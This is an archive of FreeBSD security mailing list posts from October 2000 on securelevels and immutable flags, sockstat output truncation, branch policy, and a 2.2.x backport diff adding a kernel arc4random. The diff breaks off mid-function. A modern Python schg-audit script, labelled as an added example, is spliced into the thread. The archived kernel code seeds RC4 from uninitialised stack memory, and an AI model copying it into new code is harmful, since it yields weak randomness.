of the message From owner-freebsd-security Fri Oct 6 5:40:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from sentinel.office1.bg (sentinel.office1.bg [195.24.48.182]) by hub.freebsd.org (Postfix) with SMTP id 7FC3537B502 for ; 
Fri, 6 Oct 2000 05:40:38 -0700 (PDT) Received: (qmail 5890 invoked by uid 1001); 6 Oct 2000 12:33:43 -0000 Date: Fri, 6 Oct 2000 15:33:43 +0300 
From: Peter Pentchev To: Walter Hop Cc: Michael Bryan , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf Message-ID: <20001006153343.B232@ringwraith.office1.bg> References: <39D93044.8B0C4E69@ursine.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from walter@skydancer.nl on Tue, Oct 03, 2000 at 03:40:54AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 03:40:54AM +0200, Walter Hop wrote: > [in reply to Michael Bryan , 02/10/00] > > > If any port has a listener on it, as an admin you'd better know what that > > listener is > > This shell script should be in the base ;) > > lsof -i | grep LISTEN | awk '{ print $1 "("$3") " $9} ' | sort | uniq > > Don't recall where I got it from, some Linux site I believe... And to paraphrase an earlier comment by DES, "Funny way to say sockstat | fgrep '*.*'" :) G'luck, Peter -- This would easier understand fewer had omitted. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 6: 4:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 371EE37B66D for ; Fri, 6 Oct 2000 06:04:13 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA19360; Fri, 6 Oct 2000 06:03:38 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda19358; Fri Oct 6 06:03:24 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.0/8.9.1) id e96D3O048860; Fri, 6 Oct 2000 06:03:24 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdm48857; Fri Oct 6 06:02:46 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e96D2k345593; Fri, 6 Oct 2000 06:02:46 -0700 (PDT) Message-Id: <200010061302.e96D2k345593@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdX45589; Fri Oct 6 06:01:59 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group 
From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: Hank Leininger Cc: freebsd-security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) In-reply-to: Your message of "Thu, 05 Oct 2000 02:23:42 EDT." <200010050623.CAA05646@mailer.progressive-comp.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 06 Oct 2000 06:01:59 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200010050623.CAA05646@mailer.progressive-comp.com>, Hank Leininger writes: > I've a feeling I'm (re)stating the obvious, but IMHO securelevels can't > really permanently preserve a system's known-good state in the face of root > compromise unless literally everything you'd ever access w/o securelevels > raised, is fully protected when they are (in which case you'll effectively > have everything interesting RO -- just set the RO jumper on the drive while > you're at it). Otherwise there will always(?) be some extra-mile way to > circumvent them. Of course we can devise countermeasures ad nauseam -- for > instance, set all dirs in root's path to schg and only set sappnd on the > "last" one, and never change the order (silly). Or from every directory > "higher" in the path than a path'ed command, create a symlink to the right > place (unspeakably ugly, but works ;) Though you'll still have the 'sl', > 'ls-l', etc trojan possibilities either way. I think your first point is the only solution -- every R/O file would need the schg flag. Some co-workers and I had discussed this very issue about 2-3 years ago. The only solution we could arrive at was to burn the O/S onto a CDROM or set the R/O jumper on the drive, both of which would be administrative nightmares when the team administering the system is a ferry or helijet ride away, making managing such a system a very expensive proposition.
Wouldn't setting schg on every binary and every config file on the system and running at securelevel 2 be equally effective? Then again there's the possibility of a bug in the system that would allow any attacker to reduce the securelevel. So once again we're faced with your first point as the only solution. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 6:24:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 5FC6037B66D for ; Fri, 6 Oct 2000 06:24:09 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id JAA64042; Fri, 6 Oct 2000 09:24:05 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Fri, 6 Oct 2000 09:24:05 -0400 (EDT)
From: Robert Watson X-Sender: robert@fledge.watson.org To: Cy Schubert - ITSD Open Systems Group Cc: Hank Leininger , freebsd-security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) In-Reply-To: <200010061302.e96D2k345593@cwsys.cwsent.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 6 Oct 2000, Cy Schubert - ITSD Open Systems Group wrote: > Wouldn't setting schg on every binary and every config file on the > system and running at securelevel 2 be equally effective? Then again > there's the possibility of a bug in the system that would allow any > attacker to reduce the securelevel. So once again we're faced with your > first point as the only solution. You also have to set schg on directories, as recent changes in the kernel cause it to aggressively search /boot and other locations for configuration files that may not exist by default. Either you need to create all of them and schg them, or schg the directories to prevent the creation of these files. The aggressiveness of the kernel in searching out files, especially loadable kernel modules, these days is quite astounding, and probably one strong reason why schg on files will now never be sufficient.
Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 6:29:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 177E137B66C for ; Fri, 6 Oct 2000 06:29:43 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id GAA19413; Fri, 6 Oct 2000 06:29:39 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda19411; Fri Oct 6 06:29:36 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.0/8.9.1) id e96DTW848995; Fri, 6 Oct 2000 06:29:32 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdn48993; Fri Oct 6 06:28:47 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e96DSkN45703; Fri, 6 Oct 2000 06:28:46 -0700 (PDT) Message-Id: <200010061328.e96DSkN45703@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdF45699; Fri Oct 6 06:28:33 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group 
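An audit for the gap Robert Watson points out above (schg on files alone does not stop new files being created next to them), as an added example that is not from the thread: it walks a tree and reports every directory and regular file that lacks the schg (SF_IMMUTABLE) flag, so that a directory left unprotected is listed even when every file inside it is immutable. `st_flags` is only present in stat results on BSD-derived systems, so the flag reader is injectable and the demonstration simulates the two policies discussed (flags on every binary and config file only, versus flags on everything) on a constructed sample tree; the sample paths are made up for the demo.

```python
"""Audit a tree for entries that lack the schg (SF_IMMUTABLE) flag.

Added example, not from the thread.  It checks the point that schg must
cover directories as well as files: an immutable file does nothing to stop
root from creating a *new* file beside it (a loader configuration file or a
kernel module the kernel will go looking for).  `flags_of` is injectable so
the logic runs on a host without BSD file flags; the sample tree below is
constructed for the demonstration.
"""
import os
import shutil
import stat
import tempfile

# schg is the system immutable flag.  Python's stat module defines it on
# most builds; the BSD value (0x00020000) is the fallback if it is missing.
SF_IMMUTABLE = getattr(stat, "SF_IMMUTABLE", 0x00020000)


def bsd_flags(path):
    """Return the file flags of `path`; 0 where the OS has no st_flags."""
    return getattr(os.lstat(path), "st_flags", 0)


def unprotected(root, flags_of=bsd_flags):
    """Return every directory and regular file under `root` without schg.

    Both kinds are reported on purpose: a directory without schg can still
    receive new entries even when everything already in it is immutable.
    """
    missing = []
    for dirpath, _dirs, filenames in os.walk(root):
        paths = [dirpath] + [os.path.join(dirpath, f) for f in filenames]
        for path in paths:
            if not (flags_of(path) & SF_IMMUTABLE):
                missing.append(os.path.relpath(path, root))
    return sorted(missing)


def demo():
    """Audit a constructed tree twice: files-only schg, then everything."""
    base = tempfile.mkdtemp()
    try:
        # Constructed sample tree; names chosen to resemble a FreeBSD root.
        for rel in ("bin/ls", "boot/loader.conf", "etc/rc.conf"):
            path = os.path.join(base, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write("# sample\n")

        # Simulate "chflags schg" on every binary and config file, no dirs.
        files_only = lambda p: SF_IMMUTABLE if os.path.isfile(p) else 0
        gaps_files_only = unprotected(base, files_only)

        # Simulate "chflags -R schg" on the whole tree.
        everything = lambda p: SF_IMMUTABLE
        gaps_everything = unprotected(base, everything)
        return gaps_files_only, gaps_everything
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    gaps, _ = demo()
    print("entries without schg (files-only policy):", gaps)
```

On a FreeBSD host, `unprotected("/boot")` with the default reader reads the real flags; compare with `ls -lo` and close gaps with `chflags schg` (or `chflags -R schg` for a whole directory). Note the other half of the argument above: at securelevel 1 or higher the system immutable flag can still be set but not cleared, so the audit can add protection on a running system, but undoing a mistake means a reboot to single-user mode.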
From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: Carroll Kong Cc: dima@unixfreak.org, "Jeffrey J. Mountin" , security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) In-reply-to: Your message of "Thu, 05 Oct 2000 09:12:05 CDT." <4.2.2.20001005090906.0639d560@email.eden.rutgers.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Fri, 06 Oct 2000 06:28:33 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.2.2.20001005090906.0639d560@email.eden.rutgers.edu>, Carroll Kong writes: > Not sure if this is just extending the problem, but if it is going to be a > reboot box, why not create a special freebsd box that uses an octopus > 8-serial port card (for multiple machines) and null modem cables to hook > into these "secured" boxes. Naturally we would have to treat this box as a > hardened box as well. (running only sshd and firewalled and cannot accept > console logging requests). > > I have heard (ok, sorry I did not test it yet), that the Boot Loader will > automatically call up the serial port -> console drivers. So this way you > COULD call a reboot and go into single user mode from your special freebsd > console box by using minicom! > > If the most part of the annoyance is physical access, it is somewhat > eliminated by my console idea. Passwords would be secured over the serial > port (clear text, but nowhere to broadcast to), unless someone was > physically tapping, but if he got that far to tap, you are dead meat > anyway. I should get a null modem in my house to test for the "bootloader > showing up in console" bit. If you REALLY want full console access like to > the BIOS, there is the netweasel. > > So what do you think? Please respond if there are any flaws in this idea?
We currently do a form of this on our raised floor, except that the console server does allow console logins -- the purpose of this box is twofold, remote access to the console via encrypted Kerberos sessions and the reduction of consoles littering our computer room. In our Vancouver datacentre we will be implementing, on 14 OCT, a similar arrangement but we will have two console servers, one Sun and one FreeBSD (for infrastructure boxes we scrape together whatever we can), both of which will serve each other as console servers, reducing our need to travel to Vancouver to possibly twice a year (hopefully). Physical access will be severely limited. As for hardware and software we use conserver (also in ports) and Cyclades cards in our FreeBSD and Linux console servers and Aurora cards in our Solaris console servers. The console servers use IPF for firewalls and only allow a subset of Kerberos services not running on the ports assigned to Kerberos. Solaris upgrades are currently done by jumpstart and FreeBSD upgrades would be done using make buildworld, so no CDROMS would need to be loaded local to the machine being upgraded. I haven't heard of netweasel before. Where can I find out more about it? Our original thoughts on BIOS access were to have a contractor on call for situations that would require physical access to the box, e.g. hit the power switch, BIOS access to the FreeBSD console server, or to escort a CE into the room. 
Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 6:30:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from kendra.ne.mediaone.net (kendra.ne.mediaone.net [24.218.227.234]) by hub.freebsd.org (Postfix) with ESMTP id 20B8C37B66D for ; Fri, 6 Oct 2000 06:30:44 -0700 (PDT) Received: from xena (xena.hh.kew.com [192.168.203.148]) by kendra.ne.mediaone.net (Postfix) with SMTP id 327638C18 for ; Fri, 6 Oct 2000 09:30:43 -0400 (EDT) Message-ID: <002101c02f99$a04b6010$94cba8c0@hh.kew.com> 
From: "Drew Derbyshire" To: References: <39D93044.8B0C4E69@ursine.com> <20001006153343.B232@ringwraith.office1.bg> Subject: sockstat (was Re: cvs commit: src/etc inetd.conf) Date: Fri, 6 Oct 2000 09:30:43 -0400 Organization: Kendra Electronic Wonderworks, Stoneham, MA 02180 (http://www.kew.com) MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
> And to paraphrase an earlier comment by DES,
> "Funny way to say sockstat | fgrep '*.*'" :)

Urp!

sockstat seems to truncate port numbers on the FOREIGN ADDRESS under 4.1 release ...

USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
postfix  smtpd    44199    4 tcp4   *.25                  *.*
root     sshd     44004    4 tcp4   192.168.203.135.22    192.168.203.148.13
socks    socks5   43989    5 tcp4   192.168.203.135.10    *.*
socks    socks5   43989    6 tcp4   192.168.203.135.10    192.168.203.145.10
socks    socks5   43989    7 tcp4   24.218.227.234.311    205.188.6.205.5190

Looking at netstat for the ssh connection:

tcp4       0     36  192.168.203.135.22     192.168.203.148.1302   ESTABLISHED

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Oct 6 7: 0: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id EB68637B502 for ; Fri, 6 Oct 2000 07:00:06 -0700 (PDT) Received: from ophelia.nectar.com (ophelia.nectar.com [10.5.5.2]) by gw.nectar.com (Postfix) with ESMTP id E33D21925E; Fri, 6 Oct 2000 09:00:05 -0500 (CDT) Received: (from nectar@localhost) by ophelia.nectar.com (8.9.3/8.9.3) id JAA01468; Fri, 6 Oct 2000 09:01:38 -0500 (CDT) (envelope-from nectar@spawn.nectar.com) Date: Fri, 6 Oct 2000 09:01:38 -0500
From: "Jacques A. Vidrine" To: Brett Glass Cc: Warner Losh , security@freebsd.org Subject: Re: Stable branch Message-ID: <20001006090138.B1410@ophelia.nectar.com> References: <4.3.2.7.2.20001005105420.04a7b540@localhost> <20001004220906.D50210@dragon.nuxi.com> <200010051830.MAA01024@harmony.village.org> <4.3.2.7.2.20001005173257.048b9f00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20001005173257.048b9f00@localhost>; from brett@lariat.org on Thu, Oct 05, 2000 at 05:36:56PM -0600 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [Dropped freebsd-developers, since it isn't an open list. Unfortunately, this doesn't really belong on freebsd-security either, but I don't care to move it now.] On Thu, Oct 05, 2000 at 05:36:56PM -0600, Brett Glass wrote: > Personally, I would equate "-SOLID" with "suitable for production > machines" whereas -STABLE would be "OK for application developers > and eager/early adopters but still settling down to the confidence > level of -SOLID." > > Which might imply setting things up so that the -STABLE branch > becomes -SOLID after, say, a good .2 release. Two ideas that are related only by the fact that I am skeptical of the feasibility of yet another branch maintained by our volunteers: 1. A -SOLID or -BUGFIX branch sounds like a business opportunity to me. 2. I wonder about the feasibility of another tag on the -STABLE branch that follows behind RELENG_4. It may be easier to identify the last-known-excellent point on -STABLE than to maintain another branch. I should also note that I, personally, think that production systems should run -RELEASE, plus locally applied hot-fixes. Yes, I realize that many shops may not have the expertise to do this. See (1).
-- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 7: 1:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from sentinel.office1.bg (sentinel.office1.bg [195.24.48.182]) by hub.freebsd.org (Postfix) with SMTP id B628537B502 for ; Fri, 6 Oct 2000 07:01:41 -0700 (PDT) Received: (qmail 6609 invoked by uid 1001); 6 Oct 2000 14:00:34 -0000 Date: Fri, 6 Oct 2000 17:00:34 +0300 
From: Peter Pentchev To: Drew Derbyshire Cc: security@FreeBSD.ORG Subject: Re: sockstat (was Re: cvs commit: src/etc inetd.conf) Message-ID: <20001006170034.D232@ringwraith.office1.bg> References: <39D93044.8B0C4E69@ursine.com> <20001006153343.B232@ringwraith.office1.bg> <002101c02f99$a04b6010$94cba8c0@hh.kew.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <002101c02f99$a04b6010$94cba8c0@hh.kew.com>; from software@kew.com on Fri, Oct 06, 2000 at 09:30:43AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, Oct 06, 2000 at 09:30:43AM -0400, Drew Derbyshire wrote:
> > And to paraphrase an earlier comment by DES,
> > "Funny way to say sockstat | fgrep '*.*'" :)
>
> Urp!
>
> sockstat seems to truncate port numbers on the FOREIGN ADDRESS under 4.1
> release ...

Almost true - sockstat trims *both* local and foreign addresses to 20 chars each. However, in the case discussed, the issue was listening ports, which are in most cases bound to '*.portno' locally and always show '*.*' as foreign address.

[3 minutes of source browsing]

Uhm.. correction :)

sockstat trims local and foreign addresses to 20 chars each, but netstat (which sockstat invokes), when invoked with -Aan (which is how sockstat invokes it), trims local and foreign addresses to 18 chars each to fit all the info on one line :(

So the problem is with netstat, or rather with sockstat's usage of -A to get the socket control block address, to link it with fstat's output later.
G'luck, Peter -- .siht ekil ti gnidaer eb d'uoy ,werbeH ni erew ecnetnes siht fI To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 8:54:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id E3D9537B503 for ; Fri, 6 Oct 2000 08:54:53 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13hZpi-0007zV-00; Fri, 06 Oct 2000 17:54:50 +0200 Date: Fri, 6 Oct 2000 17:54:50 +0200 (IST) 
From: Roman Shterenzon To: "Jacques A. Vidrine" Cc: security@freebsd.org Subject: Re: Stable branch In-Reply-To: <20001006090138.B1410@ophelia.nectar.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Fri, 6 Oct 2000, Jacques A. Vidrine wrote:
..snipped..
> 1. A -SOLID or -BUGFIX branch sounds to me like a business
> opportunity.
>
> 2. I wonder about the feasibility of another tag on the -STABLE
> branch that follows behind RELENG_4. It may be easier to
> identify the last-known-excellent point on -STABLE than to
> maintain another branch.
>
> I should also note that I, personally, think that production systems
> should run -RELEASE, plus locally applied hot-fixes. Yes, I realize
> that many shops may not have the expertise to do this. See (1).

I have to disagree with you. I think that the errata should be maintained more aggressively, noting all the bugfixes that may disturb normal operation, and providing links to the fixes as separate diff files. Then it's a trivial task to write a perl (or even shell) script which will:

0) say that sources are needed if they're not there
1) download the latest errata
2) interactively ask about what fixes to apply
3) download relevant fixes
4) apply the fixes
5) rebuild what needs to be rebuilt and install
6) reboot if the kernel was modified (perhaps some flag must be set in errata to trigger a reboot)

As I already said, there's no need for a separate branch; it will make merging even more difficult. And btw, STABLE is *stable* most of the time :)

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel.
Tel: +972-9-9522361 ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 10:13:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 602BD37B503 for ; Fri, 6 Oct 2000 10:13:47 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e96HDiH03677; Fri, 6 Oct 2000 11:13:45 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA09674; Fri, 6 Oct 2000 11:13:44 -0600 (MDT) Message-Id: <200010061713.LAA09674@harmony.village.org> To: Dmitry Valdov Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) Cc: Ruslan Ermilov , Fernando Schapachnik , security@FreeBSD.ORG In-reply-to: Your message of "Fri, 06 Oct 2000 16:37:37 +0400." References: Date: Fri, 06 Oct 2000 11:13:44 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Dmitry Valdov writes: : And how about 2.x branch? I don't think anybody has backported it yet. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 10:37:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id C3C8637B66C for ; Fri, 6 Oct 2000 10:37:12 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e96Have11156; Fri, 6 Oct 2000 10:36:57 -0700 (PDT) Date: Fri, 6 Oct 2000 10:36:57 -0700 
From: Alfred Perlstein To: Warner Losh Cc: Dmitry Valdov , Ruslan Ermilov , Fernando Schapachnik , security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) Message-ID: <20001006103657.D27736@fw.wintelcom.net> References: <200010061713.LAA09674@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <200010061713.LAA09674@harmony.village.org>; from imp@village.org on Fri, Oct 06, 2000 at 11:13:44AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Warner Losh [001006 10:15] wrote: > In message Dmitry Valdov writes: > : And how about 2.x branch? > > I don't think anybody has backported it yet. I'm on it. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 11:18:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 145AA37B502 for ; Fri, 6 Oct 2000 11:18:56 -0700 (PDT) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id PAA43096 for security@freebsd.org; Fri, 6 Oct 2000 15:20:58 -0300 (ART) 
From: Fernando Schapachnik Message-Id: <200010061820.PAA43096@ns1.via-net-works.net.ar> Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) To: security@freebsd.org Date: Fri, 6 Oct 2000 15:20:58 -0300 (ART) Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Have any of you been able to download patches? The URL is not accessible and there is nothing in the ERRATA file either.

Fernando P. Schapachnik
Network administration
VIA NET.WORKS ARGENTINA S.A.
fernando@via-net-works.net.ar
(54-11) 4323-3333

From owner-freebsd-security Fri Oct 6 11:24:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 8C18E37B503 for ; Fri, 6 Oct 2000 11:24:04 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e96INF900326; Fri, 6 Oct 2000 11:23:15 -0700 (PDT) Date: Fri, 6 Oct 2000 11:23:15 -0700
From: Alfred Perlstein To: Warner Losh Cc: Dmitry Valdov , Ruslan Ermilov , Fernando Schapachnik , security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) Message-ID: <20001006112315.A266@fw.wintelcom.net> References: <200010061713.LAA09674@harmony.village.org> <20001006103657.D27736@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <20001006103657.D27736@fw.wintelcom.net>; from bright@wintelcom.net on Fri, Oct 06, 2000 at 10:36:57AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Alfred Perlstein [001006 10:37] wrote: > * Warner Losh [001006 10:15] wrote: > > In message Dmitry Valdov writes: > > : And how about 2.x branch? > > > > I don't think anybody has backported it yet. > > I'm on it. I just booted a box, things look OK, please review as this is a bit more complex than the other patches because of a lack of arc4 random in 2.2.x Index: i386/conf/files.i386 =================================================================== RCS file: /home/ncvs/src/sys/i386/conf/Attic/files.i386,v retrieving revision 1.141.2.25 diff -u -u -r1.141.2.25 files.i386 --- i386/conf/files.i386 1999/09/05 08:10:53 1.141.2.25 +++ i386/conf/files.i386 2000/10/06 15:56:50 @@ -256,6 +256,7 @@ libkern/strncpy.c standard libkern/udivdi3.c standard libkern/umoddi3.c standard +libkern/arc4random.c standard gnu/i386/fpemul/div_small.s optional gpl_math_emulate gnu/i386/fpemul/errors.c optional gpl_math_emulate gnu/i386/fpemul/fpu_arith.c optional gpl_math_emulate Index: libkern/arc4random.c =================================================================== RCS file: arc4random.c diff -N arc4random.c --- /dev/null Fri Oct 6 02:19:19 2000 +++ arc4random.c Fri Oct 6 09:18:44 2000 
@@ -0,0 +1,111 @@ +/*- + * THE BEER-WARE LICENSE + * + * wrote this file. As long as you retain this notice you + * can do whatever you want with this stuff. If we meet some day, and you + * think this stuff is worth it, you can buy me a beer in return. + * + * Dan Moschuk + * + * $FreeBSD: src/sys/libkern/arc4random.c,v 1.6 2000/09/11 19:34:04 jhb Exp $ + */ + +#include +#include + +#define ARC4_MAXRUNS 64 + +static u_int8_t arc4_i, arc4_j; +static int arc4_initialized = 0; +static int arc4_numruns = 0; +static u_int8_t arc4_sbox[256]; + +static __inline void +arc4_swap(u_int8_t *a, u_int8_t *b) +{ + u_int8_t c; + + c = *a; + *a = *b; + *b = c; +} + +/* + * Stir our S-box. + */ +static void +arc4_randomstir (void) +{ + u_int8_t key[256]; + int r, n; + + /* r = read_random(key, sizeof(key)); */ + r = 0; /* XXX MarkM - revisit this when /dev/random is done */ + /* if r == 0 || -1, just use what was on the stack */ + if (r > 0) + { + for (n = r; n < sizeof(key); n++) + key[n] = key[n % r]; + } + + for (n = 0; n < 256; n++) + { + arc4_j = (arc4_j + arc4_sbox[n] + key[n]) % 256; + arc4_swap(&arc4_sbox[n], &arc4_sbox[arc4_j]); + } +} + +/* + * Initialize our S-box to its beginning defaults. + */ +static void +arc4_init(void) +{ + int n; + + arc4_i = arc4_j = 0; + for (n = 0; n < 256; n++) + arc4_sbox[n] = (u_int8_t) n; + + arc4_randomstir(); + arc4_initialized = 1; +} + +/* + * Generate a random byte. + */ +static u_int8_t +arc4_randbyte(void) +{ + u_int8_t arc4_t; + + arc4_i = (arc4_i + 1) % 256; + arc4_j = (arc4_j + 